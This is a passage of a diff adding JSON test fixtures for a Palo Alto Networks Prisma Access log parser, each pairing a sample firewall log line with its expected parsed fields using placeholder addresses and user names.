+        "user.name@corp.com"
+      ]
+    },
+    "rule": {
+      "name": "Global_Outbound_internet_access",
+      "uuid": "c38e111b-43fc-4de4-a17c-c372af557193"
+    },
+    "source": {
+      "bytes": 10688,
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 43823
+      },
+      "packets": 13,
+      "port": 63516,
+      "user": {
+        "name": "user.name@corp.com"
+      }
+    },
+    "user": {
+      "name": "user.name@corp.com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json
new file mode 100644
index 000000000..58c77fa30
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json	
@@ -0,0 +1,142 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|ProfileToken=xxxxx dtz=UTC rt=Feb 27 2021 20:16:21 deviceExternalId=xxxxxxxxxxxxx PanOSApplicationContainer= PanOSApplicationRisk=5 PanOSApplicationSubcategory=file-sharing PanOSApplicationTechnology=peer-to-peer PanOSCaptivePortal=false PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=paloaltonetwork duser=xxxxx duid= PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=false PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDecryptedLog=false PanOSIsDecryptedPayloadForward=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsInspectionBeforeSession=true PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=false PanOSIsSystemReturn=false PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=0 PanOSOutboundInterfaceDetailsPort=0 PanOSOutboundInterfaceDetailsSlot=0 PanOSOutboundInterfaceDetailsType=unknown PanOSOutboundInterfaceDetailsUnit=0 PanOSSDWANFECRatio=0.0 PanOSSanctionedStateOfApp=false PanOSSessionOwnerMidx=false PanOSSessionTracker=16 PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx suser=xxxxx xxxxx suid= PanOSTunneledApplication=tunneled-app PanOSUsers=xxxxx\\\\xxxxx xxxxx PanOSVirtualSystemID=1 PanOSApplicationCategory=peer2peer PanOSConfigVersion=10.0 start=Feb 27 2021 20:16:17 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=deny-attackers cs1Label=Rule suser0=xxxxx\\\\xxxxx xxxxx duser0=paloaltonetwork\\\\xxxxx app=fileguri cs3=vsys1 cs3Label=VirtualLocation cs4=untrust cs4Label=FromZone cs5=ethernet4Zone-test1 cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=unknown cs6=rs-logging cs6Label=LogSetting cn1=25596 cn1Label=SessionID cnt=1 spt=22871 dpt=27092 sourceTranslatedPort=24429 destinationTranslatedPort=14744 proto=tcp act=deny PanOSBytes=1370294 out=400448 in=969846 cn2=314 cn2Label=PacketsTotal PanOSSessionStartTime=Feb 27 2021 20:15:48 cn3=56 cn3Label=SessionDuration cs2=custom-category cs2Label=URLCategory externalId=xxxxxxxxxxxxx PanOSSourceLocation=east-coast PanOSDestinationLocation=BR PanOSPacketsSent=194 PanOSPacketsReceived=120 reason=unknown PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx cat=unknown PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Feb 27 2021 20:15:40 PanOSTunnel=GRE PanOSEndpointAssociationID=-3746994889972252628 PanOSChunksTotal=1945 PanOSChunksSent=323 PanOSChunksReceived=1622 PanOSRuleUUID=017e4d76-2003-47f4-8afc-1d35c808c615 PanOSHTTP2Connection=469139 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName=dynug-4 PanOSX-Forwarded-ForIP=1.1.1.1 PanOSSourceDeviceCategory=N-Phone PanOSSourceDeviceProfile=n-profile PanOSSourceDeviceModel=Nexus PanOSSourceDeviceVendor=Google PanOSSourceDeviceOSFamily=LG-H790 PanOSSourceDeviceOSVersion=Android v6 PanOSSourceDeviceHost=pan-301 PanOSSourceDeviceMac=839147449905 PanOSDestinationDeviceCategory=N-Phone PanOSDestinationDeviceProfile=n-profile PanOSDestinationDeviceModel=Nexus PanOSDestinationDeviceVendor=Google PanOSDestinationDeviceOSFamily=H1511 PanOSDestinationDeviceOSVersion=Android v7 PanOSDestinationDeviceHost=pan-355 PanOSDestinationDeviceMac=530589561221 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSContainerName=pan-dp-77754f4 PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDynamicAddressGroup= aqua_dag PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner=session_owner-4 PanOSTimeGeneratedHighResolution=Feb 27 2021 20:16:18 PanOSNSSAINetworkSliceType=0 PanOSNSSAINetworkSliceDifferentiator=1bca5"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|ProfileToken=xxxxx dtz=UTC rt=Feb 27 2021 20:16:21 deviceExternalId=xxxxxxxxxxxxx PanOSApplicationContainer= PanOSApplicationRisk=5 PanOSApplicationSubcategory=file-sharing PanOSApplicationTechnology=peer-to-peer PanOSCaptivePortal=false PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=paloaltonetwork duser=xxxxx duid= PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=false PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDecryptedLog=false PanOSIsDecryptedPayloadForward=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsInspectionBeforeSession=true PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=false PanOSIsSystemReturn=false PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=0 PanOSOutboundInterfaceDetailsPort=0 PanOSOutboundInterfaceDetailsSlot=0 PanOSOutboundInterfaceDetailsType=unknown PanOSOutboundInterfaceDetailsUnit=0 PanOSSDWANFECRatio=0.0 PanOSSanctionedStateOfApp=false PanOSSessionOwnerMidx=false PanOSSessionTracker=16 PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx suser=xxxxx xxxxx suid= PanOSTunneledApplication=tunneled-app PanOSUsers=xxxxx\\\\xxxxx xxxxx PanOSVirtualSystemID=1 PanOSApplicationCategory=peer2peer PanOSConfigVersion=10.0 start=Feb 27 2021 20:16:17 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=deny-attackers cs1Label=Rule suser0=xxxxx\\\\xxxxx xxxxx duser0=paloaltonetwork\\\\xxxxx app=fileguri cs3=vsys1 cs3Label=VirtualLocation cs4=untrust cs4Label=FromZone cs5=ethernet4Zone-test1 cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=unknown cs6=rs-logging cs6Label=LogSetting cn1=25596 cn1Label=SessionID cnt=1 spt=22871 dpt=27092 sourceTranslatedPort=24429 destinationTranslatedPort=14744 proto=tcp act=deny PanOSBytes=1370294 out=400448 in=969846 cn2=314 cn2Label=PacketsTotal PanOSSessionStartTime=Feb 27 2021 20:15:48 cn3=56 cn3Label=SessionDuration cs2=custom-category cs2Label=URLCategory externalId=xxxxxxxxxxxxx PanOSSourceLocation=east-coast PanOSDestinationLocation=BR PanOSPacketsSent=194 PanOSPacketsReceived=120 reason=unknown PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx cat=unknown PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Feb 27 2021 20:15:40 PanOSTunnel=GRE PanOSEndpointAssociationID=-3746994889972252628 PanOSChunksTotal=1945 PanOSChunksSent=323 PanOSChunksReceived=1622 PanOSRuleUUID=017e4d76-2003-47f4-8afc-1d35c808c615 PanOSHTTP2Connection=469139 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName=dynug-4 PanOSX-Forwarded-ForIP=1.1.1.1 PanOSSourceDeviceCategory=N-Phone PanOSSourceDeviceProfile=n-profile PanOSSourceDeviceModel=Nexus PanOSSourceDeviceVendor=Google PanOSSourceDeviceOSFamily=LG-H790 PanOSSourceDeviceOSVersion=Android v6 PanOSSourceDeviceHost=pan-301 PanOSSourceDeviceMac=839147449905 PanOSDestinationDeviceCategory=N-Phone PanOSDestinationDeviceProfile=n-profile PanOSDestinationDeviceModel=Nexus PanOSDestinationDeviceVendor=Google PanOSDestinationDeviceOSFamily=H1511 PanOSDestinationDeviceOSVersion=Android v7 PanOSDestinationDeviceHost=pan-355 PanOSDestinationDeviceMac=530589561221 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSContainerName=pan-dp-77754f4 PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDynamicAddressGroup= aqua_dag PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner=session_owner-4 PanOSTimeGeneratedHighResolution=Feb 27 2021 20:16:18 PanOSNSSAINetworkSliceType=0 PanOSNSSAINetworkSliceDifferentiator=1bca5",
+    "event": {
+      "action": "deny",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 56,
+      "severity": 3,
+      "start": "2021-02-27T20:16:17Z",
+      "timezone": "UTC",
+      "type": [
+        "denied"
+      ]
+    },
+    "@timestamp": "2021-02-27T20:16:21Z",
+    "action": {
+      "type": "end"
+    },
+    "destination": {
+      "address": "1.1.1.1",
+      "bytes": 400448,
+      "geo": {
+        "country_iso_code": "BR"
+      },
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 14744
+      },
+      "packets": 120,
+      "port": 27092,
+      "user": {
+        "name": "xxxxx"
+      }
+    },
+    "host": {
+      "hostname": "xxxxx",
+      "id": "xxxxxxxxxxxxx",
+      "mac": "839147449905",
+      "name": "xxxxx",
+      "os": {
+        "family": "LG-H790",
+        "version": "Android v6"
+      },
+      "type": "N-Phone"
+    },
+    "log": {
+      "hostname": "xxxxx",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "fileguri",
+      "bytes": 1370294,
+      "packets": 314,
+      "transport": "tcp"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "ethernet4Zone-test1"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "untrust",
+          "name": "n"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "PanOSContainerName": "pan-dp-77754f4",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "N-Phone",
+      "PanOSDestinationDeviceHost": "pan-355",
+      "PanOSDestinationDeviceMac": "530589561221",
+      "PanOSDestinationDeviceModel": "Nexus",
+      "PanOSDestinationDeviceOSFamily": "H1511",
+      "PanOSDestinationDeviceOSVersion": "Android v7",
+      "PanOSDestinationDeviceProfile": "n-profile",
+      "PanOSDestinationDeviceVendor": "Google",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSGPHostID": "xxxxxxxxxxxxxx",
+      "PanOSHASessionOwner": "session_owner-4",
+      "PanOSSessionStartTime": "Feb 27 2021 20:15:48",
+      "PanOSSourceDeviceHost": "pan-301",
+      "PanOSSourceDeviceModel": "Nexus",
+      "PanOSSourceDeviceProfile": "n-profile",
+      "PanOSSourceDeviceVendor": "Google",
+      "PanOSSourceDynamicAddressGroup": "aqua_dag",
+      "PanOSSourceLocation": "east-coast",
+      "PanOSX-Forwarded-ForIP": "1.1.1.1",
+      "URLCategory": "custom-category",
+      "VirtualLocation": "vsys1",
+      "endpoint": {
+        "serial_number": "xxxxxxxxxxxxxx"
+      }
+    },
+    "related": {
+      "hosts": [
+        "xxxxx"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
+      "user": [
+        "xxxxx",
+        "xxxxx xxxxx"
+      ]
+    },
+    "rule": {
+      "name": "deny-attackers",
+      "uuid": "017e4d76-2003-47f4-8afc-1d35c808c615"
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "bytes": 969846,
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 24429
+      },
+      "packets": 194,
+      "port": 22871,
+      "user": {
+        "name": "xxxxx xxxxx"
+      }
+    },
+    "user": {
+      "name": "xxxxx xxxxx"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json
new file mode 100644
index 000000000..3445ddc4f
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json	
@@ -0,0 +1,78 @@
+{
+  "input": {
+    "message": "1,2024/01/03 13:15:29,026701002040,TRAFFIC,end,2816,2024/01/03 13:15:29,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,MyRule,,,ssl,vsys1,Z_DMZ_PROXY,Z_INTERCO_WAN,ethernet1/22.301,ethernet1/3.104,Log Profile,2024/01/03 13:15:29,219781,1,60975,443,0,0,0x41c,tcp,allow,5773,758,5015,14,2024/01/03 13:15:14,0,not-resolved,,7312415129244589397,0x0,10.0.0.0-10.255.255.255,United States,,7,7,tcp-fin,0,0,0,0,,PA2314-CD,from-policy,,,0,,0,,N/A,0,0,0,0,0bbe5a53-f498-4cc2-a170-ced134f4824c,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2024-01-03T13:15:30.547+01:00,,,encrypted-tunnel,networking,browser-based,4,\\\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,ssl,no,no,0,NonProxyTraffic,"
+  },
+  "expected": {
+    "message": "1,2024/01/03 13:15:29,026701002040,TRAFFIC,end,2816,2024/01/03 13:15:29,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,MyRule,,,ssl,vsys1,Z_DMZ_PROXY,Z_INTERCO_WAN,ethernet1/22.301,ethernet1/3.104,Log Profile,2024/01/03 13:15:29,219781,1,60975,443,0,0,0x41c,tcp,allow,5773,758,5015,14,2024/01/03 13:15:14,0,not-resolved,,7312415129244589397,0x0,10.0.0.0-10.255.255.255,United States,,7,7,tcp-fin,0,0,0,0,,PA2314-CD,from-policy,,,0,,0,,N/A,0,0,0,0,0bbe5a53-f498-4cc2-a170-ced134f4824c,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2024-01-03T13:15:30.547+01:00,,,encrypted-tunnel,networking,browser-based,4,\\\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,ssl,no,no,0,NonProxyTraffic,",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 0,
+      "outcome": "success",
+      "type": [
+        "end"
+      ]
+    },
+    "@timestamp": "2024-01-03T12:15:30.547000Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "end"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "bytes": 5015,
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "packets": 7,
+      "port": 443
+    },
+    "log": {
+      "hostname": "PA2314-CD",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "ssl",
+      "bytes": 5773,
+      "packets": 14,
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "PA2314-CD",
+      "product": "PAN-OS",
+      "serial_number": "026701002040"
+    },
+    "paloalto": {
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "0.0.0.0",
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "rule": {
+      "name": "MyRule",
+      "uuid": "0bbe5a53-f498-4cc2-a170-ced134f4824c"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 758,
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "packets": 7,
+      "port": 60975
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json
new file mode 100644
index 000000000..3238eb5e4
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json	
@@ -0,0 +1,78 @@
+{
+  "input": {
+    "message": "<14>Sep 16 10:00:00 PA 1,9/16/19 10:00,1801017000,TRAFFIC,deny,2049,9/16/19 10:00,10.0.0.2,1.2.3.4,5.4.4.3,5.4.3.2,DENYALL,,,protection,vsys1,DNS,AAAAA,ae2.503,ethernet1/1,Secure,9/16/19 10:00,11111,1,130000,53,6379,53,0x400000,udp,reset-both,284,284,0,1,9/16/19 10:00,0,any,0,50660381851,0x0,10.0.0.0-10.255.255.255,Spain,0,1,0,policy-deny,0,0,0,0,,PA-1,from-application,,,0,,0,,N/A,0,0,0,0"
+  },
+  "expected": {
+    "message": "<14>Sep 16 10:00:00 PA 1,9/16/19 10:00,1801017000,TRAFFIC,deny,2049,9/16/19 10:00,10.0.0.2,1.2.3.4,5.4.4.3,5.4.3.2,DENYALL,,,protection,vsys1,DNS,AAAAA,ae2.503,ethernet1/1,Secure,9/16/19 10:00,11111,1,130000,53,6379,53,0x400000,udp,reset-both,284,284,0,1,9/16/19 10:00,0,any,0,50660381851,0x0,10.0.0.0-10.255.255.255,Spain,0,1,0,policy-deny,0,0,0,0,,PA-1,from-application,,,0,,0,,N/A,0,0,0,0",
+    "event": {
+      "action": "reset-both",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 0,
+      "outcome": "success",
+      "type": [
+        "denied"
+      ]
+    },
+    "@timestamp": "2019-09-16T10:00:00Z",
+    "action": {
+      "name": "reset-both",
+      "outcome": "success",
+      "type": "deny"
+    },
+    "destination": {
+      "address": "1.2.3.4",
+      "bytes": 0,
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "5.4.3.2",
+        "port": 53
+      },
+      "packets": 0,
+      "port": 53
+    },
+    "log": {
+      "hostname": "PA-1",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "protection",
+      "bytes": 284,
+      "packets": 1,
+      "transport": "udp"
+    },
+    "observer": {
+      "name": "PA-1",
+      "product": "PAN-OS",
+      "serial_number": "1801017000"
+    },
+    "paloalto": {
+      "Threat_ContentType": "deny",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "10.0.0.2",
+        "5.4.3.2",
+        "5.4.4.3"
+      ]
+    },
+    "rule": {
+      "name": "DENYALL"
+    },
+    "source": {
+      "address": "10.0.0.2",
+      "bytes": 284,
+      "ip": "10.0.0.2",
+      "nat": {
+        "ip": "5.4.4.3",
+        "port": 6379
+      },
+      "packets": 1,
+      "port": 130000
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/url_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/url_cef.json
new file mode 100644
index 000000000..41d495725
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/url_cef.json	
@@ -0,0 +1,135 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|url|1|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:48:21 deviceExternalId=xxxxxxxxxxxxx PanOSApplicationCategory=database PanOSApplicationContainer= PanOSApplicationRisk=2 PanOSApplicationSubcategory=database PanOSApplicationTechnology=client-server PanOSCaptivePortal=false PanOSCloudHostname=xxxxx PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=xxxxx duser=xxxxx o\"'\"test duid= PanOSHTTPRefererFQDN= PanOSHTTPRefererPort= PanOSHTTPRefererProtocol= PanOSHTTPRefererURLPath= PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=true PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=true PanOSIsSystemReturn=true PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=32350 PanOSOutboundInterfaceDetailsPort=2 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSSanctionedStateofApp=false PanOSSeverity=Informational PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx suser=xxxxx xxxxx suid= PanOSTunneledApplication=untunneled PanOSURLDomain=?% PanOSUsers=xxxxx\\\\xxxxx xxxxx PanOSVirtualSystemID=1 PanOSConfigVersion=10.0 start=Mar 01 2021 20:48:16 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=allow-business-apps cs1Label=Rule suser0=xxxxx\\\\xxxxx xxxxx duser0=xxxxx\\\\xxxxx o\"'\"test app=maxdb cs3=vsys1 cs3Label=VirtualLocation cs4=ethernet4Zone-test4 cs4Label=FromZone cs5=untrust cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=ethernet1/2 cs6=rs-logging cs6Label=LogSetting cn1=980296 cn1Label=SessionID cnt=1 spt=32350 dpt=1532 sourceTranslatedPort=26236 destinationTranslatedPort=12016 proto=tcp act=block-url request=?% cs2=sports cs2Label=URLCategory flexString2=server to client flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=west-coast PanOSDestinationLocation=PK requestContext=application/jpeg fileId=0 PanOSURLCounter=1 requestClientApplication= PanOSX-Forwarded-For= PanOSReferer= PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSSourceUUID= PanOSDestinationUUID= requestMethod=post PanOSIMSI=1 PanOSIMEI=Navy Base PanOSParentSessionID=8802 PanOSParentStarttime=Mar 01 2021 20:48:10 PanOSTunnel=VXLAN PanOSInlineMLVerdict=overflow PanOSContentVersion=50222 PanOSSigFlags=2 PanOSHTTPHeaders= PanOSURLCategoryList=sports,\u200b11008,\u200b38340 PanOSRuleUUID=ec14df0b-c845-4435-87a2-d207730f5ae8 PanOSHTTP2Connection=8802 PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory=L-Phone PanOSSourceDeviceProfile=l-profile PanOSSourceDeviceModel=Note 4G PanOSSourceDeviceVendor=Lenovo PanOSSourceDeviceOSFamily=K6 PanOSSourceDeviceOSVersion=Android v9 PanOSSourceDeviceHost=pan-505 PanOSSourceDeviceMac=596703749274 PanOSDestinationDeviceCategory=L-Phone PanOSDestinationDeviceProfile=l-profile PanOSDestinationDeviceModel=Note XT PanOSDestinationDeviceVendor=Lenovo PanOSDestinationDeviceOSFamily=K8 PanOSDestinationDeviceOSVersion=Android v8 PanOSDestinationDeviceHost=pan-506 PanOSDestinationDeviceMac=150083646537 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSContainerName=pan-dp-77754f4 PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDynamicAddressGroup= blue_dag PanOSDestinationDynamicAddressGroup= PanOSTimeGeneratedHighResolution=Mar 01 2021 20:48:16 PanOSNSSAINetworkSliceType=b5"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|url|1|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:48:21 deviceExternalId=xxxxxxxxxxxxx PanOSApplicationCategory=database PanOSApplicationContainer= PanOSApplicationRisk=2 PanOSApplicationSubcategory=database PanOSApplicationTechnology=client-server PanOSCaptivePortal=false PanOSCloudHostname=xxxxx PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=xxxxx duser=xxxxx o\"'\"test duid= PanOSHTTPRefererFQDN= PanOSHTTPRefererPort= PanOSHTTPRefererProtocol= PanOSHTTPRefererURLPath= PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=true PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=true PanOSIsSystemReturn=true PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=32350 PanOSOutboundInterfaceDetailsPort=2 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSSanctionedStateofApp=false PanOSSeverity=Informational PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx suser=xxxxx xxxxx suid= PanOSTunneledApplication=untunneled PanOSURLDomain=?% PanOSUsers=xxxxx\\\\xxxxx xxxxx PanOSVirtualSystemID=1 PanOSConfigVersion=10.0 start=Mar 01 2021 20:48:16 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=allow-business-apps cs1Label=Rule suser0=xxxxx\\\\xxxxx xxxxx duser0=xxxxx\\\\xxxxx o\"'\"test app=maxdb cs3=vsys1 cs3Label=VirtualLocation cs4=ethernet4Zone-test4 cs4Label=FromZone cs5=untrust cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=ethernet1/2 cs6=rs-logging cs6Label=LogSetting cn1=980296 cn1Label=SessionID cnt=1 spt=32350 dpt=1532 sourceTranslatedPort=26236 destinationTranslatedPort=12016 proto=tcp act=block-url request=?% cs2=sports cs2Label=URLCategory flexString2=server to client flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=west-coast PanOSDestinationLocation=PK requestContext=application/jpeg fileId=0 PanOSURLCounter=1 requestClientApplication= PanOSX-Forwarded-For= PanOSReferer= PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 